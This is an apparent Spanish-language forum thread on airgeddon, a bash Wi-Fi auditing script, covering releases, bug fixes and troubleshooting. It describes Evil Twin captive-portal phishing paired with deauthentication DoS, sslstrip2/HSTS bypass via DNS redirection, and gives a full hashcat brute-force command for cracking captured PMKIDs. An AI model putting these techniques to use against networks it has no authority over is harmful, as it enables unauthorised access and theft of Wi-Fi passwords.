@bender, sí, es compatible con 32 bits. Eso si, la instalación de las dependencias correrá de tu cuenta. Algunas como sslstrip que ya la han retirado de los repos de debian y como consecuencia también de Kali o Parrot, ya no se pueden poner con un simple comando apt, pero hay muchas maneras de instalarlas. O bien desde el propio repo de ssltrip en https://github.com/moxie0/sslstrip (https://github.com/moxie0/sslstrip) o descargando los paquetes .deb de aquí mismamente: https://github.com/v1s1t0r1sh3r3/airgeddon_deb_packages

Saludos terrícolas!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 18-10-2020, 22:26 (Domingo)
voy a probar  , me extraña que al chequear no tengas que cambiar nada, ya que el ejectable que se buscaba no deberia existir y deberia decir que no esta , ..

el checker , deberia ser para el ejecutable nuevo , lo miro y te digo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 18-10-2020, 22:33 (Domingo)
y bueno , lo sperado , si buscas un ejecutable que no existe , pues sale error..


el ejecutable se llamara  -->  hcxpcapngtool

pero tu script busca  -->  commands_to_packages_correspondence["hcxpcaptool"]="hcxtools"
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-10-2020, 22:33 (Domingo)
Si, he cambiado como bien dices el ejecutable a chequear. Pero vamos, que en las versiones viejas de hcxtools están los dos (al menos en mi kali y parrot están las dos). Ahora se valida el nuevo. Lo que no he tenido que cambiar es la sugerencia del paquete a instalar si te falta ya que sigue siendo el mismo, hcxtools.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-10-2020, 22:35 (Domingo)
no no , ya está cambiado... miralo bien, en la rama dev. que esto no llega a master hasta q no haya relase, la v10.31 que tardará aún.

Ahhh vale, ya te pillo... eso es en un plugin.. en el plugin se me ha olvidado cambiarlo... voy a ello. Que es una chorrada. Además ese plugin solo afecta a Kali, parrot y BlackArch, pero efectivamente faltaba cambiarlo ahí...a veces se me olvida q existen! jeje. Gracias!

EDIT: Hecho!!! aquí el commit: https://github.com/v1s1t0r1sh3r3/airgeddon/commit/43c03ac5a3d424fc697b424242c1fbc46e308f2a (https://github.com/v1s1t0r1sh3r3/airgeddon/commit/43c03ac5a3d424fc697b424242c1fbc46e308f2a)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 18-10-2020, 22:36 (Domingo)
no no , ya está cambiado... miralo bien, en la rama dev. que esto no llega a master hasta q no haya relase, la v10.31 que tardará aún.

Ahhh vale, ya te pillo... eso es en un plugin.. en el plugin se me ha olvidado cambiarlo... voy a ello. Que es una chorrada.

no he dicho nada ..todo bien

hcxpcapngtool .... Ok
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 18-10-2020, 22:44 (Domingo)
mire el code antes de ejecutarlo , por eso postee ..  lo vi en el plugin.


push como estable ...  para empaquetarla ... aunque ya la tengo , pero para no empaquetar una version dev.


tengo que abrirles un commit , a los del hcxtools, pero para el proyecto hcxdumptool , han metido llamaba a una cabecera ssl , que solo esta en ramas

openssl-1.1.X  , haciendo imposible compilarlo en sistemas que aun usen openssl-1.0.X

Código: [Seleccionar]
error fatal: openssl/bioerr.h
PERO ESO YA ES OTRA HISTORIA.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 19-10-2020, 00:37 (Lunes)
ya ha dicho varias veces que los fixes no estan en el master si no en la rama dev   ---->  10.31

https://github.com/v1s1t0r1sh3r3/airgeddon/tree/dev
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 19-10-2020, 07:29 (Lunes)
como q no? eso tiene q funcionar! entras en el menú de evil twin (7), luego lanzas un captive portal (9), cuando te pregunta si tienes handshake, le dices q no y se pone a escanear, seleccionas el target, eliges el tipo de DoS, se pone a hacer la movida... asegurate de que no consigues un handshake o pmkid ya que la prueba va de simular que no lo consigues... para ello lo mejor es elegir un AP que no tenga clientes, así no consigues el handshake seguro, o también que según se abre la ventana del DoS (la roja), la cierras manualmente muy rápido según se abre, y ya está... esperas que se consuma el tiempo de timeout, te dirá en un mensajito que no lo has conseguido... y simplemente ahora en lugar de volver al menú de evil twin principal, te lleva al de DoS para que elijas otro y puedas probar de nuevo (ahí también tienes opción de salir, el (0)). Eso es todo... en la v10.31 está arreglado... era una chorrada donde la lié en el cambio de la v10.10 a la v10.11.

Por si os interesa la programación... resulta que se lanzaba una función, y luego se evaluaba su "exit code", que en bash es $?. Bien pues metí entre la función y esa evaluación algo... así q ya me cargo el exit code de lo último lanzado porque pasa a ser el de lo que metí en medio en lugar de el que tenía que ser. El fix fue simplemente subir una linea lo que metí y dejar como estaba la función y su evaluación de $? para que estén juntitos y seguidos como tiene que ser. Una chorrada de commit: https://github.com/v1s1t0r1sh3r3/airgeddon/commit/a267938ee862e96e15c095f02d3c6c6484e09ecb

No me vengas con que no funciona porque es imposible que no funcione... está más que localizado, probado y reprobado... y lo acabo de probar yo ahora otra vez más por si a caso... y va perfect.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 19-10-2020, 22:17 (Lunes)
vas a tardar mucho en pasarla a "master" ?¿

lo digo por empaquetar la dev o esperarme.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 19-10-2020, 23:50 (Lunes)
Pues es que no quería sacar una release solo con eso... quería liarme con mas cosas... así que si, voy a tardar... lo que pasa es que si la empaquetas como v10.31 el día que salga la 10.31 con mas cosas... bueno, no creo q sea problema, te aviso y la empaquetas de nuevo. Si quieres ve haciéndolo si te parece un tema apremiante.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 19-10-2020, 23:58 (Lunes)
Pues es que no quería sacar una release solo con eso... quería liarme con mas cosas... así que si, voy a tardar... lo que pasa es que si la empaquetas como v10.31 el día que salga la 10.31 con mas cosas... bueno, no creo q sea problema, te aviso y la empaquetas de nuevo. Si quieres ve haciéndolo si te parece un tema apremiante.


no hay problema de nada , cuando es una version dev/git  , la numeracion del paquete se añade el commit donde clonaste.

Código: [Seleccionar]
10.31_43c03ac
todas las distros lo hacen asi vamos ,  para diferenciar una release "stable"  , de un commit especifico o version dev.

ya la he empaquetado ,  asi que como veas, la cosa es que dais paquetes compilados para archlinux, que no va a funcionar  ;D

a mi no me afecta por que soy yo el que lleva todo , y voy cudrando cosas, pero en arch ,cada uno llva lo suyo ... el que mantiene hcxtools en arch , puso la 6.1.3 hace ya dias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 20-10-2020, 08:02 (Martes)
No te preocupes por los de Arch. Casi todo el mundo de Arch que usa airgeddon usa BlackArch, y ahí funciona bien de momento. Si te refieres al binario que tenemos en el repo que sacamos con cada versión, ese va ligado a lo de los repos de AUR, si alguien tiene cualquier cosa me lo dirán. No obstante, intentaré darme prisa en sacar la release, lo que pasa es que quería liarme con los temas de integrar bettercap 2.x y quitar la dependencia del viejo sslstrip (que el paquete sslstrip fue quitado de los repos de Debian y por lo tanto de Kali/Parrot y otros sucedaneos) y estaba dando quebraderos de cabeza a la gente para instalarlo. Aunque no creo que esto sea sencillo de hacer. Para integrar bettercap 2.x, aunque tengo un branch con gran parte del trabajo ya hecho, hay que hacer muchas pruebas... y estuvo parado mucho tiempo debido a que el sslstrip no funcionaba bien en bettercap 2.x, pero parece que tras un Pull Request de alguien en Github ha empezado a funcionar... aunque ya digo que tengo que hacer pruebas. Así que esto tardará... desarrollo, testing, integración de nueva versión con validaciones... tiene pinta de que tardaré.

Si finalmente veo que me demoro mucho, pues saco release con esto y ya está, pero quería evitar sacar una release tan "pelada". Ya veré. Aunque gracias por los tips.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 21-10-2020, 08:21 (Miércoles)
Se te está yendo la olla o algo.... bájate la versión de la rama dev. Y sigue los pasos que describo en el post de arriba... es imposible que no funcione. Así que alguna estás liando, en serio...

respecto a lo del sslstrip2 que comentas... ese video de 2013 está un poquito desfasado ya... desde hace mil que aunque sslstrip pueda hacer un sslstrip a un sitio con HSTS, ya incluyeron en las listas internas de los navegadores las páginas más famosas como google, gmail, facebook, twitter, etc... eso quiere decir que aunque tu pidas al navegador la web por http, el navegador sabe que esas páginas son ssl y las pide directamente por https sin llegar a hacer la primera petición http de la que sslstrip se aprovecha, por lo que no se puede hacer sslstrip a uno de estos sitios a menos q combines con temas dns como hace bettercap para "truquear" los dominios y cambiar supongamos www.facebook.com por wwww.facebook.com y similares de tal forma que el navegador no sepa que eso está en la lista de ssl directo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 21-10-2020, 08:35 (Miércoles)
Se te está yendo la olla o algo.... bájate la versión de la rama dev. Y sigue los pasos que describo en el post de arriba... es imposible que no funcione. Así que alguna estás liando, en serio...

respecto a lo del sslstrip2 que comentas... ese video de 2013 está un poquito desfasado ya... desde hace mil que aunque sslstrip pueda hacer un sslstrip a un sitio con HSTS, ya incluyeron en las listas internas de los navegadores las páginas más famosas como google, gmail, facebook, twitter, etc... eso quiere decir que aunque tu pidas al navegador la web por http, el navegador sabe que esas páginas son ssl y las pide directamente por https sin llegar a hacer la primera petición http de la que sslstrip se aprovecha, por lo que no se puede hacer sslstrip a uno de estos sitios a menos q combines con temas dns como hace bettercap para "truquear" los dominios y cambiar supongamos www.facebook.com por wwww.facebook.com y similares de tal forma que el navegador no sepa que eso está en la lista de ssl directo.

sslstrip2 se usa junto a dns2proxy para redireccionar  ;D
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 21-10-2020, 08:40 (Miércoles)
si, eso digo... q sin redirección dns no hay nada que hacer... de todas formas, como bettercap hace todo eso junto, pues es más guay porq con una tool haces todo. Por eso uso bettercap para el sslstrip2. Lo que pasa es que cuando sacaron bettercap2, se les fue la olla y comenzaron a meterle mil funcionalidades de otro tipo y se cargaron literalmente el ssltrip, que ha estado sin funcionar en bettercap 2.x muuuuucho tiempo, hasta ahora, que un tio con una PR lo ha arreglado parece ser... así que ahora igual me puedo plantear dar soporte a bettercap 2.x

Aquí está el issue más largo de la historia que abrimos en su día: https://github.com/bettercap/bettercap/issues/428
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 21-10-2020, 09:49 (Miércoles)
vaya , entonces veo que no soy el unico que se dedica a abrir commits en github , ademas se nota que sabeis bastante de que va el tema , me alegra mucho la verdad.

Pues  a darle al bettercap2
Título: Re:Script multiuso en bash, airgeddon
Publicado por: sol666 en 21-10-2020, 21:46 (Miércoles)
bettercap es un poco complicao de usar,tiene un monton de modulos,pero es la navaja suiza,cuando te haces a ella haces lo que quieras.Airgeddon rama dev me funciona bien asi que algo haces mal waydehawai  ;D ;D
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 14-12-2020, 17:04 (Lunes)
Buenas gente... una release calentita antes de terminar el año. La v10.31 acaba de salir con este changelog:

Citar
- Fixed error of no returning to DoS menu after fail on handshake capture for Evil Twin Captive portal attack
 - Fixed error of no returning to Evil Twin main menu for some special situations on BeEF attack
 - Removed deprecated hcxpcaptool, replaced by hcxpcapngtool
 - Replaced old PMKID hash format to be used in hashcat, from 16800 to 22000
 - Improved responsive behaviour of Evil Twin Captive Portal web page
 - Compatibility extended to Bettercap 2.x (>=2.28) for sslstrip2/BeEF Evil Twin attack

Y por fin con soporte de bettercap 2.x (siempre que sea 2.28 o superior como indico en el wiki, aunque la tool te lo valida todo para que no la puedas liar)

Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 14-12-2020, 22:17 (Lunes)
Buenas gente... una release calentita antes de terminar el año. La v10.31 acaba de salir con este changelog:

Citar
- Fixed error of no returning to DoS menu after fail on handshake capture for Evil Twin Captive portal attack
 - Fixed error of no returning to Evil Twin main menu for some special situations on BeEF attack
 - Removed deprecated hcxpcaptool, replaced by hcxpcapngtool
 - Replaced old PMKID hash format to be used in hashcat, from 16800 to 22000
 - Improved responsive behaviour of Evil Twin Captive Portal web page
 - Compatibility extended to Bettercap 2.x (>=2.28) for sslstrip2/BeEF Evil Twin attack



Y por fin con soporte de bettercap 2.x (siempre que sea 2.28 o superior como indico en el wiki, aunque la tool te lo valida todo para que no la puedas liar)

Saludos!


Gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 19-01-2021, 23:24 (Martes)
Marchando nueva release de airgeddon... la v10.40

Tiene una dependencia menos, el sslstrip se ha quitado. Al fin quitamos el problema de tener un paquete tan viejo, aunque aquí en Wifislax eso no era un problema, en otras distros sí que lo era cuando quitaron el paquete sslstrip de los repos. Ahora todo se hace con bettercap. Así que el único cambio "estructural" sería ese... no hay cambios en ficheros, solo esa dependencia menos.

Ya de paso comentar que desde la anterior release, la v10.31 ya nos añadieron también por fin a los repos de Kali Linux. Aunque aquí es un poco offtopic, pero es que fue una alegría!  >:(

Bueno, esto sigue creciendo, muchas gracias por el apoyo como siempre! dejo por aquí el changelog:

Citar
Removed deprecated route command
Fixed error on WPS PINs found in database counter
Sslstrip Evil Twin attack replaced by Bettercap-Sslstrip2 Evil Twin attack, sslstrip dependency removed
Fixed error on Evil Twin attacks when tmux and Bettercap 2.x used
Fixed wrong username shown on asleap decryption after capture for Enterprise Evil Twin attack
Fixed freezing while trying to resume reaver session

Saludos terrícolas y feliz año nuevo!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 20-01-2021, 13:28 (Miércoles)
 ;)

que cabron , justo acabo de cerrar una iso que hiba ya a subir como release estable , ...voy a actualizar esto.

gracias.   >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 20-01-2021, 13:45 (Miércoles)
vaaaaaaaaaaaaya puntería... por los pelos no hemos entrado  ^-^
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 20-01-2021, 13:58 (Miércoles)
vaaaaaaaaaaaaya puntería... por los pelos no hemos entrado  ^-^

Na hombre ya esta actualizado y ademas actualice el bettercap 2.28 al 2.29

ya subiendo iso ...  ;)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 25-01-2021, 01:27 (Lunes)
saludos, soy nuevo tanto en el foro como en este mundo de la seguridad wireless, he descargado la ultima actualizacion de wifislax2.4 para 64 bit y he probado varias herramientas y todo ok , mi problema esta al momento de querer usa el ataque hashcat con captura de PMKID, yo abro el programa de airgeddon y me voy a la opcion de captura de PMKID la ejecuto a mi red tplink y hay momentos que no captura nada y otros momento si captura los PMKID porque cuando se cierra la ventana el programa me dice que he capturado el PMIKD y me crea el directorio y el problema radica cuando me voy a el ataque de hashcat y elijo la opcion de ataque de hashcat con diccionario sobre la captura PMKID que viene siendo la opcion 6 en la opcion personal del ataque hashcat, el problema radica  cuando me pide la ruta de la captura yo la busco en el admisnistrador de archivo la consigo y la arrastro o pego y me sale que la ruta es correcta pero despues mas abajo me sale la notificacion en rojo que el fichero seleccionado no tiene formato valido de hashes PMKID, hasta ahi llego y no se que hacer si alguien me puede ayudar  se lo agradezco, en especial le pido ayuda al creador de la herramienta airgeddon a el señor v1s1t0r.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-01-2021, 11:05 (Lunes)
vaya... pues has encontrado un bug.... he logrado reproducirlo, incluso lo he mirado y ya se lo que ocurre. Te cuento el por qué de este bug:

Hasta la versión 10.30 el formato del hash capturado de un pmkid que estaba usando airgeddon era uno... con el cambio en las hcxtools ya se aprovechó para cambiarlo por el nuevo. Esos cambios se hicieron, y la regex que valida el formato del hash se cambió, pero se ve que hay un fallo. Lo soluciono y cuando esté, os aviso por aquí. El commit irá en la rama dev y el fix estará para la v10.41, pero ya sabeis que siempre se puede adelantar uno y clonar del github la rama dev si se quiere probar. Lo dicho, aviso cuando esté. Gracias por el report.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-01-2021, 11:15 (Lunes)
Hecho, este es el commit: https://github.com/v1s1t0r1sh3r3/airgeddon/commit/636eb38279c95bc85bbfeddc43f1d9f4e5453e21

Lo dicho, si lo quieres probar, basta con hacer
Citar
git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon
y luego meterte en la carpeta y ejecutarlo con bash ./airgeddon.sh , verás que ya está arreglado.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-01-2021, 13:53 (Lunes)
A ver Filomeno... es normal que si tienes la tarjeta ocupada creando un AP en un canal fijo y demás tareas, si sabres un airodump en otra ventana y le pones a escanear (el escaneo le obliga a saltar de canal) pues que todo se vaya al traste es lo más normal del mundo.

Respecto a cuando dices que no te abre el AP open... pues cuando haces un evil twin siempre crea un AP open. Si no te lo está abriendo seguramente te avise en la ventana del "Fake AP" (la de arriba a la izquierda), y en lugar de poner AP-ENABLED te estará poniendo alguna otra cosa que será un error o DISABLED o algo así. La verdad es que sin saber la versión de airgeddon, sin saber que chipset usas, sin ver ningún pantallazo ni demás... es complicado ayudarte. Te propongo tres cosas...

1. Lanza airmon-ng check kill antes de entrar en airgeddon y prueba
2. Para evitar lo anterior, descárgate la versión v10.41 de la rama dev de github (git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon.git) ya que ahí hay cambios relacionados con eso, y está en la rama dev porque aún no han salido esos cambios, es por si lo quieres probar en lugar de esperar
3. Para más dudas y mejor atención, conéctate al canal de discord donde no solo yo, sino ya toda una comunidad te puede ayudar (eso sí, es en inglés todo).

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-01-2021, 17:08 (Lunes)
Yo te puedo asegurar que en airgeddon va a funcionar, pero si ya se hacen cosas fuera de airgeddon mientras a la vez se trabaja con airgeddon... pues como decirlo... eso ya está "fuera de mi jurisdicción".

Respecto a lo de que falle a veces, creeme, es justo eso lo que pasa, por eso los cambios de la v10.41, que te ahorran hacer lo del airmon-ng check kill. Aunque tú creas que está parado, hazlo... o usa la v10.41. Ya verás como te funciona. Y el discord no es un foro, es una web (también tiene app de móvil) de chat. Hay muchos servers con canales. El de airgeddon está muy bien porque ahí la gente se ayuda con estas cosas. Una vez te registres, para unirte al canal, haz click en el enlace de invitación público que hay en el wiki de nuestro github, en la sección de contacto.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: wil en 25-01-2021, 18:46 (Lunes)
hola mi pregunta para a el señor v1s1t0r.
cuando las 6 ventanilla se habre de airgedon
hay una que me pone esto

webserver
connectios.c.750) invalid request-line -> sending status 400
connectios.c.750) invalid request-line -> sending status 400
connectios.c.750) invalid request-line -> sending status 400
connectios.c.750) invalid request-line -> sending status 400

como puedo solucionarlo?
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-01-2021, 23:50 (Lunes)
Filomeno, me estoy refiriendo a que te descargues la versión v10.41 que aún no ha salido. Por eso lo de poner el -b dev para descargar de la rama dev que es la de desarrollo (development) de github. Al arrancar airgeddon debe poner v10.41, si no, es que no tienes la correcta, la que te estoy diciendo que seguramente te va a funcionar. Mira bien el comando que puse!

Wil, no se que ataque estás lanzando... porque no das muchos detalles, solo que tienes errores. Me supongo que es un Evil Twin con portal cautivo... pero tengo malas noticias, la verdad es que no he visto ese error nunca... si dices que aparece en la ventana del webserver es que tienes algún problema en el paquete lighttpd que es el que levanta el servidor web del portal cautivo. Yo reinstalaría ese paquete. ¿Qué linux usas? ¿es wifislax? porque en wifislax no deberías tener ningún problema con eso pues ya viene preinstalado y funcionante.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: wil en 26-01-2021, 17:32 (Martes)
ok
luego te subo foto y me comenta
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 26-01-2021, 23:26 (Martes)
Una buena denegación de servicio a la red legítima y asegurarte de que hay clientes... y a esperar. Esto es como ir a pescar... hay dias q pescas y otros no...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 27-01-2021, 16:02 (Miércoles)
Esa tarjeta es muy buena aunque solo sirva para 2.4ghz y no tenga soporte 5ghz. Como puedes ver en el enlace del wiki de airgeddon, está en la "whitelist":

https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Cards%20and%20Chipsets

Si ya no pescas nunca tendrás que ir a pescar a otro lado... a mi el ataque Evil Twin de portal cautivo me ha ido muy bien muchas veces... no siempre, está claro. El componente de ingeniería social que requiere y que pasa por que un humano caiga en la trampa ya es muy variable dependiendo de la persona, sus conocimientos, sus ansias de tener internet al estar bajo la denegación de servicio, y otros factores no controlables.

Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 27-01-2021, 19:23 (Miércoles)
Esa tarjeta es muy buena aunque solo sirva para 2.4ghz y no tenga soporte 5ghz. Como puedes ver en el enlace del wiki de airgeddon, está en la "whitelist":
si que soporta 5ghz es una alfa.
la que no soporta es la tp-link con ese chip que esta capada por eso esta tirada de precio

gracias

tu no sabes ni lo que tienes  ;D

la alfa con chip ar9271  es la NHA que soporta B G N
la alfa que soporta 5ghz es la ACH   es AC  y NO LLEVA AR9271

Pero bueno , ahora diras que lo has mirao bien y la tarjeta te trollea y ya esta  ;D



Título: Re:Script multiuso en bash, airgeddon
Publicado por: wil en 27-01-2021, 19:37 (Miércoles)
hay alguna manera de modificar el index  airgeddon
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-01-2021, 10:27 (Jueves)
Wil, si al decir "modificar el index" te refieres a modificar la página del portal cautivo (joder, a veces hay que hacer unas interpretaciones de vuestros mensajes... ya podíais explicaros un poquito), pues sí, se puede... es algo que me preguntan mucho y por lo tanto está en la wiki. De hecho en la wiki está casi todo lo que la gente pregunta. Echadle un ojo al apartado de FAQ:

https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/FAQ%20&%20Troubleshooting

Lo que tú buscas, concretamente está además aquí:

https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/FAQ%20&%20Troubleshooting#can-be-the-evil-twin-captive-portal-page-be-customized-how

Saludos terrícolas!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 31-01-2021, 23:17 (Domingo)
Exactamente.... invalid hardware family... poco podemos hacer con software ahí.... has de conseguir un adaptador que no te de problemas. Lo que pasa es que me suena muy raro porque me dijiste en otro post que tenías una Alfa con chipset ar9271 y esa alfa (que yo la tengo también) va de lujo y soporta todo. De hecho, está en la lista blanca de tarjetas que funcionan sin problemas (este es el link https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Cards%20and%20Chipsets)... así que o hay algo que no nos estás contando o no se qué decirte...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 01-02-2021, 14:58 (Lunes)
Hecho, este es el commit: https://github.com/v1s1t0r1sh3r3/airgeddon/commit/636eb38279c95bc85bbfeddc43f1d9f4e5453e21

Lo dicho, si lo quieres probar, basta con hacer
Citar
git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon
y luego meterte en la carpeta y ejecutarlo con bash ./airgeddon.sh , verás que ya está arreglado.

Saludos.


Buenos Dias, gracias por responder, disculpa que hasta ahora es que estoy leyendo tu respuesta, de verdad gracias pero tengo que confesarte que no entiendo lo que me dices ya que no se nada de este lenguaje de programacion si tu me puedes ayudar explicandome con imagenes de como ir metiendo en la carpeta el commit y ejecutarlo te lo agradezco , ,lo otro es que tengo otro inconveniente con la misma herramienta de hashcat. resulta que probe el hashcat desde airgeddon pero en vez de de captura de PMKID use handshake y resulta que el el programa de hashcat no me corre, tendra algo que ver en mi com****dora? mi com****dora tiene un procesador intel (R) pentium (R) cpu g2030, es bien sencilla sera ese el problema? o tengo que instalar algo aparte para que el hashcat pueda correr desde airgeddon?. si este es el caso cual procesador me recomiendas para que trabaje perfectamente?. gracias
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-02-2021, 15:28 (Lunes)
Prueba la versión de la rama dev de github, para ello es lo que te comento, haces el git clone que te puse el comando... luego entras a la carpeta haciendo cd airgeddon y luego haces bash airgeddon.sh y con eso verás que te sale la v10.41. Si ves esta versión es que lo has hecho correctamente. Cuando estés en ella prueba de nuevo todo lo que no te funciona incluyendo lo del hashcat para el PMKID (porque también se corrigió un fallo sobre eso). Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 01-02-2021, 21:52 (Lunes)
ya lo hice muchisimas gracias
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-02-2021, 22:08 (Lunes)
y? todo bien con esa versión supongo, no??
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 01-02-2021, 23:18 (Lunes)
no vale, que problema bueno ya el PMKID lo acepto y todo lo demas bien hasta el punto que le doy enter para que proceda el ataque y me sale esto:
Comenzando descifrado. Una vez empezado, pulse [Ctrl+C] para pararlo...
Pulsa la tecla [Enter] para continuar...
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.6, Release, LLVM 8.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
========================================================================================================================
* Device #1: pthread-Intel(R) Pentium(R) CPU G2030 @ 3.00GHz, 2807/2871 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Initializing backend runtime for device #1...
Pulsa la tecla [Enter] para continuar...

Aqui pulso enter y se sale de hashcat que esta sucediendo a que se debe esto por favor ayudame
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-02-2021, 08:03 (Martes)
Todos los mensajes que comentas parecen normales. Tras pulsar Enter comienza el descifrado... si termina pronto será que estás utilizando un diccionario muy pequeño y que termina enseguida.... o si te está dando algún error tras eso, podrías poner un pantallazo del error. De otra forma es imposible ayudarte.

¿qué ataque utilizas de hashcat sobre tu pmkid? diccionario? fuerza bruta? un pantallazo nos ayudaría... es que no se que decirte.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 02-02-2021, 12:46 (Martes)
hola estoy usando fuerza bruta , despues que yo doy enter me vuelve a salir las opciones de un principio con todos los ataques de aircrack-ng y hashcat en sus distintas modalidades.

lo que yo veo es que me salen estos dos errores

Watchdog: Hardware monitoring interface not found on your system. (La interfaz de monitoreo del hardware no se encuentra en su sistema)
Watchdog: Temperature abort trigger disabled (Disparador de aborto por temperatura deshabilitado)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-02-2021, 16:46 (Martes)
Que raro.... ¿y no da ningún error en airgeddon? vamos a hacer una cosa... prueba fuera de airgeddon. Te paso el comando que usa airgeddon para el hashcat y lo pruebas en la consola fuera de airgeddon

Citar
hashcat -m 22000 -a 3 "${hashcatpmkidenteredpath}" ${charset} --increment --increment-min=${minlength} --increment-max=${maxlength} --potfile-disable -o "${tmpdir}${hashcat_pot_tmp}"  --weak-hash-threshold 0 -D 1 --force

Obviamente tendrás que sustituir las variables por tus valores:
${hashcatpmkidenteredpath} -> la ruta al fichero del pmkid
${charset} -> el conjunto de caracteres a usar. Es decir, si solo van a ser letras, o letras y números, etc... por ejemplo si pones ?l es solo letras lowercase
${maxlength} -> el número máximo de caracteres. Es decir si pones 8 probará las palabras de un char, luego de 2 etc hasta 8 con todas las combinaciones posibles en base al charset escogido.
${tmpdir}${hashcat_pot_tmp} -> eso cambialo por la ruta del fichero de trofeo donde quieras escribir la password si la consigue descifrar... una ruta a un fichero nuevo que no exista para que se genere si se crackease

Bueno, y si tienes dudas puedes mirar la ayuda de hashcat ejecutando hashcat --help . Seguramente así puedas llegar a ver el error y saber cual es tu problema.

También te animo a que te unas al canal de discord donde hay mucha gente dando soporte. Eso sí, en inglés. El enlace para unirse está en el wiki del github, en la sección de contacto.

Saludos.

Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 02-02-2021, 16:54 (Martes)
ok , pero una pregunta , mi procesador intel (r) pentium (r) CPU G2030, with OpenCL 1.2 pocl 1.6 funciona correctamente en hashcat te lo pregunto porque en la pagina de hashcat dice que pór lo menos el opencl debe ser de 16.1.1 o mayor a esta version
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-02-2021, 17:04 (Martes)
La verdad es que no se que procesadores funcionan con hashcat... no soy un experto en hashcat ni mucho menos. De hecho pensaba que más o menos cualquier procesador funcionaba con hashcat. Así que lo suyo es que pruebes comandos hashcat fuera de airgeddon y vayas haciendo "debug" del problema a ver qué puede estar pasando.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 02-02-2021, 17:06 (Martes)
ah ok , bueno voy a ir probando gracias. cualquier cosa te vuelvo a escribir  ;D
Título: Re:Script multiuso en bash, airgeddon
Publicado por: phanta78 en 03-02-2021, 03:57 (Miércoles)
La verdad es que no se que procesadores funcionan con hashcat... no soy un experto en hashcat ni mucho menos. De hecho pensaba que más o menos cualquier procesador funcionaba con hashcat. Así que lo suyo es que pruebes comandos hashcat fuera de airgeddon y vayas haciendo "debug" del problema a ver qué puede estar pasando.


